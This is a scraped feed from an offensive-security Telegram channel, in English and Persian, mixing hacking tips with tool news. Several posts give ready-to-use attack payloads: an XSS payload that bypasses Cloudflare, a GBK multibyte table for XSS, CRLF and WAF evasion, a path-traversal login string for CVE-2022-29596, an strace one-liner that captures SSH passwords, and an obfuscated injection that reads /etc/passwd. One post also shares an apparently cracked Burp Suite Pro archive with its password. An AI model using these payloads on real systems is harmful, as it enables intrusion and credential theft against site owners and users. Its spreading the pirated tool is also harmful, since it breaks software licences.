0Day.Today | Learn Exploit | Zero World | Dark web |
19.2K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
OSINT Mind Map

#osint
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4
GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")

For XSS, CRLF, WAF bypass

#bypass #xss #crlf
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
CloudFlare XSS Bypassed

<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>

#Xss #cloudflare
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4
Black Hat 2022 USA/ASIA/Europe

USA
ASIA
EUROPE

#blackhat
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
concept of deleting/writing an arbitrary file in Sysmon (CVE-2022-41120/CVE-2022-XXXXX)

Github

#windows #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4
جدید ترین نسخه کالی 2022.4 منتشر شد .

Microsoft Azure ( Microsoft Azure store )

More Platforms ( Generic Cloud, QEMU VM image & Vagrant libvirt )

Social Networks ( New homes, keeping in touch & press packs )

Kali NetHunter Pro ( Announcing the first release of a “true” Kali Linux on the mobile phone (PinePhone / Pro)

kali NetHunter ( Internal Bluetooth support, kernel porting video, firmware updates & other improvements )

Desktop Updates ( GNOME 43 & KDE 5.26 )

New Tools ( As always, various new packages added )

kali.org

#kali
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
جدید ترین نسخه کالی 2022.4 منتشر شد . Microsoft Azure ( Microsoft Azure store ) More Platforms ( Generic Cloud, QEMU VM image & Vagrant libvirt ) Social Networks ( New homes, keeping in touch & press packs ) Kali NetHunter Pro ( Announcing the first…
در صورتی که از کالی لینوکس قدیمی تر استفاده می کنید می تونید به صورت دستی اون رو به آخرین نسخه منتشر شده آپدیت کنید . ترمینال رو باز کنید و دستورات زیر رو وارد کنید .

┌──(LearnExploit㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~
[...]

┌──(LearnExploit㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f

#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4🔥1
burpsuite_pro_v2022.12.2.zip
566.6 MB
Burp Suite Version 2022.12.2

آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *

Pass : 311138

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6😱1
CVE-2022-29596 ( MicroStrategy Enterprise Manager 2022 )

Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054= Login

#microsoft #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7
CVE-2022-2414-POC.zip
1.2 KB
CVE-2022-2414 ( Hole in pki-core )

The vulnerability allows a remote attacker to obtain the contents of arbitrary files by sending specially crafted HTTP requests.

#POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Project Zero ( Exploiting CVE-2022-42703 - Bringing back the stack attack )

link

#CVE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Sniffing SSH passwords

TL;DR
# pgrep -l sshd
6235 sshd
# strace -f -p 6235 -e trace=write -o capture

Link

#Sniff #SSH
——————
0Day.Today
@LearnExploit
@Tech_Army
👍10
Forwarded from وب آموز (m J)
💠 جادی رو برای گیت‌هاب استارز کاندید کنید
💠گیت‌هاب، پلتفرم توسعه نرم‌افزار، امسال برنامه‌ای برگزار کرده به عنوان ستارگان گیت‌هاب که در اون الهام‌بخش ترین و تاثیرگذارترین برنامه‌نویسان دنیا رو با توجه به رای مردم معرفی میکنه.
💠جادی رو میتونین با نام کاربری زیر برای کاندیدا معرفی کنین

jadijadi

🔗 https://stars.github.com/nominate

🆔 @Webamoozir
👍16👎2
Top 10 macOS Malware Discoveries in 2022

Read

#malware #macOS
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
CVE-2022-45025 ( Command injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)

Github

#POC #Pdf
——————
0Day.Today
@LearnExploit
@Tech_Army
Filter bypass with regex for OS injection commonly (/"'&amp;|()-;:.,`) block by WAF


E.g.: reading /etc/passwd file:
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
🤔4👍2
Bypass endpoint restrictions

#bugbountytips #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3